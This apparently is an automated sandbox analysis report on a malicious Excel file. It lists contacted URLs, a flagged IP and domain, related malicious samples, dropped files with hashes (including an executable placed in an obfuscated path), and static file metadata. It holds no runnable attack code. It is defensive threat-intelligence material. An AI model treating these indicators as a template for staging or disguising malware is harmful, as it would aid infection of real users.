https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
http://weather.service.msn.com/data.aspx	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://apis.live.net/v5.0/	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://management.azure.com	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://wus2.contentsync.	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://incidents.diagnostics.office.com	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://clients.config.office.net/user/v1.0/ios	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://insertmedia.bing.office.net/odc/insertmedia	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://o365auditrealtimeingestion.manage.office.com	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://api.office.net	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://incidents.diagnosticssdf.office.com	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://asgsmsproxyapi.azurewebsites.net/	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://clients.config.office.net/user/v1.0/android/policies	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://entitlement.diagnostics.office.com	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://outlook.office.com/	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://storage.live.com/clientlogs/uploadlocation	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://templatelogging.office.com/client/log	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://outlook.office365.com/	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://webshell.suite.office.com	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://management.azure.com/	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://login.windows.net/common/oauth2/authorize	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://graph.windows.net/	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://api.powerbi.com/beta/myorg/imports	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://devnull.onenote.com	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://ncus.pagecontentsync.	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://messaging.office.com/	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://augloop.office.com/v2	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://skyapi.live.net/Activity/	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/mac	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://dataservice.o365filtering.com	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.cortana.ai	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://ovisualuiapp.azurewebsites.net/pbiagave/	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false	Avira URL Cloud: safe	unknown
https://visio.uservoice.com/forums/368202-visio-on-devices	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://directory.services.	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://login.windows-ppe.net/common/oauth2/authorize	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high
https://staging.cortana.ai	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://loki.delve.office.com/api/v1/configuration/officewin32/	9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
198.244.146.96	webhub365.com	United States		18630	RIDLEYSD-NETUS	false

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	432926
Start date:	10.06.2021
Start time:	23:38:13
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	document-47-2637.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.bank.expl.evad.winXLS@6/9@1/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 100% (good quality ratio 86.3%) Quality average: 69.6% Quality standard deviation: 34.3%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 52.147.198.201, 23.211.6.115, 52.109.76.68, 52.109.12.22, 52.109.8.25, 40.88.32.150, 20.50.102.62, 20.54.104.15, 20.54.7.98, 20.54.26.129, 13.107.4.50, 20.82.210.154, 92.122.213.194, 92.122.213.247 Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, elasticShed.au.au-msedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, www.bing.com, Edge-Prod-FRAr4a.env.au.au-msedge.net, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, afdap.au.au-msedge.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, au.au-msedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, au.c-0001.c-msedge.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
198.244.146.96	document-47-2637.xls	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
RIDLEYSD-NETUS	document-47-2637.xls	Get hash	malicious	Browse	198.244.146.96

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	Fax_Doc#01_5.html	Get hash	malicious	Browse	198.244.146.96
	wa71myDkbQ.exe	Get hash	malicious	Browse	198.244.146.96
	Current-Status-062021-81197.xlsb	Get hash	malicious	Browse	198.244.146.96
	logo.png.exe	Get hash	malicious	Browse	198.244.146.96
	3F97s4aQjB.xlsx	Get hash	malicious	Browse	198.244.146.96
	WcCEh3daIE.xls	Get hash	malicious	Browse	198.244.146.96
	ATT00005.htm	Get hash	malicious	Browse	198.244.146.96
	kxjeAvsg1v.exe	Get hash	malicious	Browse	198.244.146.96
	VSA75RUmYZ.exe	Get hash	malicious	Browse	198.244.146.96
	iX22xMeXIc.exe	Get hash	malicious	Browse	198.244.146.96
	QWkt5w3cO2.exe	Get hash	malicious	Browse	198.244.146.96
	#U260e#Ufe0f Zeppelin.com AudioMessage_259-55.HTM	Get hash	malicious	Browse	198.244.146.96
	vTtOheCXBQ.exe	Get hash	malicious	Browse	198.244.146.96
	6b6zVfqxbk.xlsb	Get hash	malicious	Browse	198.244.146.96
	Check 57549.Html	Get hash	malicious	Browse	198.244.146.96
	audit-78958169.xlsb	Get hash	malicious	Browse	198.244.146.96
	Docc.html	Get hash	malicious	Browse	198.244.146.96
	askinstall39.exe	Get hash	malicious	Browse	198.244.146.96
	Lista e porosive.exe	Get hash	malicious	Browse	198.244.146.96
	askinstall39.exe	Get hash	malicious	Browse	198.244.146.96

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe	document-37-1849.xls	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\9C265DD6-ED91-4AAE-9C37-56E57236292F Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	134922
Entropy (8bit):	5.369107251625446
Encrypted:	false
SSDEEP:	1536:KcQIKNEeBXA3gBwlpQ9DQW+z7534ZliKWXboOilX5ENLWME9:aEQ9DQW+ziXOe
MD5:	4885913667B0E212E6E83C9B74AF771A
SHA1:	EFFDDE591047639F3DCF4034807D9F37A35426FE
SHA-256:	59756C811635EBF4C1F1794D57FC4A758E1A7A93DA0F74FDCC66C1C83AE0ABAC
SHA-512:	ACF822176355AAFEF2A04265976B9BC65BCEC067604B359FD50B468112E85B7EB68BA17BF1EAC626D7F78B08DE190D0CE6474136F9DDF84A9BA2F2B39C245D65
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-10T21:39:04">.. Build: 16.0.14209.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Temp\3FA40000 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	68601
Entropy (8bit):	7.6095013473066455
Encrypted:	false
SSDEEP:	768:5X3vegIg9kOKLUwxZi4IB5/vAVk/ViuHpc2HoM3DFZXHHHHHHHHHLGAX4MOw+j8j:rkNLPHqvAk/Vi6+YDT7Hbc8hxCCVl/
MD5:	9F3996ECBC98180FD2BCFE840C41E4CA
SHA1:	30F402A14E8F22F3E9B72DA06E2419537E511281
SHA-256:	CCA5AA32910672FE42CB13FF0207E8E15602E3FF67D3C29044221C8718331128
SHA-512:	7B3BFD8DD34674EC9E988A5EDB4FB4C5028C72C6862A634BE362A56F6F86AAD3799FFA4FB088649EC24CFE57188A1CF7E5C16BD17B1FAC599146C05369797A9A
Malicious:	false
Reputation:	low
Preview:	.TKo.0.....0t.l.;.....>.].u?...X.^..6....4} .W..[6.=H.....m.1......D4.U../z....)...5...k$q>.v2.[G...z1...IIj@....#..d.L..A-a...dr&U..}ns....%.....j.7N.E\..b..h..BP.r/&............^.p.n]u..{h0...u._.D.z+....r&.....o..u...)..}...0Iq..B...;.*.+...9..8<.T.$...?$..Y..s.P.....:..AW2g..I]....?kd..+zD&.CY..gZiF.).-...uC:.<@B.''n./7.{.N.T,.....o....m.M!.......K..t...S6...}..S..?....7.z....t........PK..........!...<............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................MO.0...H.......BKwAH.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:12:41 2019, mtime=Thu Jun 10 20:39:07 2021, atime=Thu Jun 10 20:39:06 2021, length=12288, window=hide
Category:	dropped
Size (bytes):	904
Entropy (8bit):	4.672568751401007
Encrypted:	false
SSDEEP:	12:8oSCXUVduCH2KOeLR4miS68+WrjAZ/DYbDJp5SeuSeL44t2Y+xIBjKZm:85i1S1AZbcDJpP7aB6m
MD5:	CB5861A7C65B698B00B963BDB3A65EAE
SHA1:	30BD2B243AA0913959069D2B7E81E0631BCE55B7
SHA-256:	11D2C94BA62AD8C8224DC0C70E330801DA0020DE457F2180FF905886F5EE79A9
SHA-512:	632645EBBCB2F6B0CE3F46EF41DC8CD4E71AD18704BE52E47B33CE5B0F94C89053BD3A4BDAFBFBDF68A48F8BAB4952A725FEC40CBBE21025F551D49086AB4D3A
Malicious:	false
Reputation:	low
Preview:	L..................F.............-....U.A^...%Q.A^...0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q\|<..user.<.......N...R.....#J......................Z.j.o.n.e.s.....~.1......R...Desktop.h.......N...R......Y..............>.....v..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......123716...........!a..%.H.VZAj...m<...............!a..%.H.VZAj...m<..........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-47-2637.LNK Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:53 2020, mtime=Thu Jun 10 20:39:07 2021, atime=Thu Jun 10 20:39:07 2021, length=92672, window=hide
Category:	dropped
Size (bytes):	2170
Entropy (8bit):	4.721481944923777
Encrypted:	false
SSDEEP:	24:8MyEmiQGNAobv1DJpf7aB6myMyEmiQGNAobv1DJpf7aB6m:8Mgi1Go7PQB6pMgi1Go7PQB6
MD5:	5940923A2A431724DABE37F3633871D0
SHA1:	2509A2D6150538B6B238C22023F6A4C1CAD3BCF6
SHA-256:	AD29413158F192C2C3425D01B987D4B547FC1F2CE05F1C97AF92962DB2F5279B
SHA-512:	481B7908EFDD5174A8FBA30AD8AC57D77F2789DBEEE832EBA99CF834A515E189DF36E5260442671E28088A0C91668D82A25BBDB936E467163BF5C2355B087726
Malicious:	false
Reputation:	low
Preview:	L..................F.... ...ig.S....W.Z.A^..W.Z.A^...j...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q\|<..user.<.......N...R.....#J......................Z.j.o.n.e.s.....~.1.....>Q}<..Desktop.h.......N...R......Y..............>.......1.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....v.2..h...R. .DOCUME~1.XLS..Z......>Q{<.R......V.....................m..d.o.c.u.m.e.n.t.-.4.7.-.2.6.3.7...x.l.s.......Z...............-.......Y...........>.S......C:\Users\user\Desktop\document-47-2637.xls..+.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.4.7.-.2.6.3.7...x.l.s.........:..,.LB.)...As...`.......X.......123716...........!a..%.H.VZAj...................!a..%.H.VZAj..............................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	101
Entropy (8bit):	4.781102818999889
Encrypted:	false
SSDEEP:	3:oyBVomMY9LRkKSd6YCZELRkKSd6YCmMY9LRkKSd6YCv:dj6Y9LaJdzgELaJdzUY9LaJdzs
MD5:	CC574425794FB97F59C2DC249939493A
SHA1:	8CA2DFD4C2535E0FFEB160319D2CD079758B7F8D
SHA-256:	1D977854F9C0DDF7462B6991CA2B6026C4FFCAF52F158A2C7B81B8FBEE5E35F0
SHA-512:	6C9C7CAFA742354DB174653D4C1CF9521AC10C67177FB2E26A85AE1267F1A45094BD1F1AE3C0B53836D5210F6083906F17C26A28A197D0CCF2F76D7447272E43
Malicious:	false
Reputation:	low
Preview:	Desktop.LNK=0..[xls]..document-47-2637.LNK=0..document-47-2637.LNK=0..[xls]..document-47-2637.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	Little-endian UTF-16 Unicode text, with CR line terminators
Category:	dropped
Size (bytes):	22
Entropy (8bit):	2.9808259362290785
Encrypted:	false
SSDEEP:	3:QAlX0Gn:QKn
MD5:	7962B839183642D3CDC2F9CEBDBF85CE
SHA1:	2BE8F6F309962ED367866F6E70668508BC814C2D
SHA-256:	5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
SHA-512:	2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
Malicious:	false
Reputation:	high, very likely benign file
Preview:	....p.r.a.t.e.s.h.....

C:\Users\user\Desktop\00B40000 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	Applesoft BASIC program data, first line number 16
Category:	dropped
Size (bytes):	117445
Entropy (8bit):	7.924149420001192
Encrypted:	false
SSDEEP:	3072:UfgagkFMp1lsZaVV6zBiA2AiuLKli2LKefgag2:0xFCLPVV+BiA2Ai0uicDd
MD5:	40F42EC6AF84151ABC504FB591A42BD4
SHA1:	13504B444A7127A12C99F75D389D8BE78F607811
SHA-256:	4342F4D6263F70D2BEC42C6D8CC1E6F23811C416265FBBF688D8D2F1AA2C5BFF
SHA-512:	52B8B4DACF29DDA70A1C63FA16F7B6D9363DC852FC9D2C4BD381DBB8C6694A131CD5D19697B45293BD5E07CA399A422EED48FDD48D7B0177C1398086F9344451
Malicious:	false
Reputation:	low
Preview:	........T8........../.............+.F\|..14.l.0..e.i...t...y...$......O~..m.........T8........../.6...........+.F\|..14.l.0..e.i...t...y...$......O~..m............f....\.p...'...0...u.........0.... d..o3......+...#uN'.wd..^.J.9v!..z.+....+k,l.%<....>t...'..........h...T:.x..5..B.....a....j....=....]......O.....6..................!....Nr=.......1.[...9.F^....@.........].".....................^1...V...D?..vQ.....Y...........O.1......(G.Z.!.AP[..:=9.LY;....~].1....{.t.D9..j...y..z.`t.......;.1...[sN5..)......2.H\........k....1.....4=(R...x.......`.0.,..g.61..B.y/.v\.2^<..[!.1......Y..........O.O..(.1......)..U.c-..3.nxt"..I...p1....w!0..@....].....:s.,\|O.T.>1.....4L.0{....s.e.h.)}....O.$}.1...'.OA<Z.....E...K....._xL...1....L...[..j.qm..^..1...O....a#.1.....!...^..(.1.FP.;...........1....dK.;.....B.r....wb....9.b.1...=..i.x.Q.x:.....(./.. L^..1......>Z..I.....Z.s...x[.}..vX..1...5..}%.gY...$.....:.....'1..R.1....JX!............c.3.,..m+..5.1...

C:\Users\user\Desktop\4F850000 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	Applesoft BASIC program data, first line number 16
Category:	modified
Size (bytes):	99740
Entropy (8bit):	7.929925379753235
Encrypted:	false
SSDEEP:	1536:n6hF9uwbh8+yV1jngo7mfk9mjhjAefouRA+VkV43RBVCOG6hFouT:nWuihUJngIQjAehZVkqbsjuT
MD5:	BA34233274FF56530F9141B9F5B5FF43
SHA1:	974F24CCD4BEE89423AF7B4ABB09537605AFD1A3
SHA-256:	D79872EFE978946ADD8D6DD0848835F0A365B69F588C0FA52F744B88FC1D10F7
SHA-512:	A27822A9DE321CE36E0BA71AEF683CCF429F43B9DBA216E086EBF186A8A037AE2DA45C0E97CCA5F6C240FE43DF173668DCA673CA6957F371C8BA42653461B8FF
Malicious:	false
Reputation:	low
Preview:	........T8........../...........X.-...f..7.........E..54...rI.89B\.".....Q+........T8........../.6.........X.-...f..7.........E..54...rI.89B\.".....Q+..........ut....\.p.!...8em.....W..4.W?..[S`..L.b%A...sH/.#.;.8.Z..^.'.y..;."C["....mE....g...o_../T...h4)N.g..6....`...^MJ..#B.....a.........=...........&....9w....Gh.....f..........zT=....a.5..i...u.y.i@..........".........g.....Y.....\1.....S.b2#J...A.k.t..\.?P.tx...o.1...]...k..U.-.).%4.@a.../..D..1... ~v....^\|]..4.2b....x..3..1....uR....Z.A.T..=..Q.J."[.Lf..1....u....NR....!.-..-.".8.uH7.XQ~1..x'..v..lU.c\...s..O.'l.0...{.".2:...j<6w1.....DI....R.T..5.K....X.\|5..C<..1....A@..."..\|....r.$6T..(Hk[v3&\|.1......{.=.P.Od.QY.....S.....^`..1....W8.[..?K..'.)..(...Q..}1..... ....g.H...1....r.....',..1.....2.Z..\..jw.w..".."..Yu.0K.1.........l'%...,..z.L../N@>.C.~bW1........G.._.e.7\|.g.c:c.Y='....,1......1.....p^.7d}.@(.....&....1....M..t.d.".p^[+.k.2...;..b...1.....DQ q...,i...G_.[3.\|.7....1...

C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe Download File
Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	44544
Entropy (8bit):	6.190125674423799
Encrypted:	false
SSDEEP:	768:AAMBmP3+XxLKZ/XMsQt1TZPImKXPXtE6MayeDkX0PmfkPchaDPfsRi7P4QG64iuU:UsP3+XxLKZ/XMsQt1TZPImKXPdfDkXSZ
MD5:	CE639EB63B7C1C1EC94651B65CCEC383
SHA1:	B92544ED405C33F2DB64A0BCA41646CB712E246B
SHA-256:	2D2EAD13B2796AD58D070DC1FD36961866F25E1E436661C760A879EAC35982F9
SHA-512:	66E841C9DF0D17AB1A1C866A96769AD0F4F8329C94EDB2917648FB4FF76E7A47C479A60A0D05293136843EC5BA938B0CEB96190BEE01AE049A467BDA45CB4566
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: document-37-1849.xls, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h.\D,.2.,.2.,.2.C.1.(.2.C.6.9.2.C.7./.2.C.3.=.2.,.3...2.C.;.:.2.C...-.2.C.0.-.2.Rich,.2.........PE..L.....]......................*......@.............@.......................................@...... ...................................................................+..T............................................................................text.............................. ..`.data...h...........................@....idata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Windows User, Last Saved By: Windows User, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jun 2 14:40:34 2021, Last Saved Time/Date: Wed Jun 2 14:40:36 2021, Security: 1
Entropy (8bit):	7.59086745125602
TrID:	Microsoft Excel sheet (30009/1) 78.94% Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:	document-47-2637.xls
File size:	92165
MD5:	92dcc47a1a044fc3a2328ec6eef3918b
SHA1:	6f9266a6c0b702cbaa0a3583df5c8cd1357eae35
SHA256:	ac4b99079b1ceb11db593097e421de9d9092765feedc23a3ab8ef912b292c988
SHA512:	fcd4b7c0a4e0f785604f40e0a9a4690e9b642223ee63088c6c4acfc262a18f5a79c77ab82498b422b229eaecc9a2e745b7e455c43ad2a85794e7adbac6b9bafd
SSDEEP:	1536:Lc2ZSmXWCQnp2c90Hg+j8z3kVfKIDVzoFGUslIB54N+wl8MYBzaVt4J5aukGqu:LXZxXTQ8hHgNQNeF3V4NvuhBzaV+J5a+
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	74ecd4c6c3c6c4d8

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "document-47-2637.xls"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Summary
Code Page:	1252
Author:	Windows User
Last Saved By:	Windows User
Create Time:	2021-06-02 13:40:34
Last Saved Time:	2021-06-02 13:40:36
Creating Application:	Microsoft Excel
Security:	1

Document Summary
Document Code Page:	1252
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	983040

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.308022095077
Base64 Encoded:	False
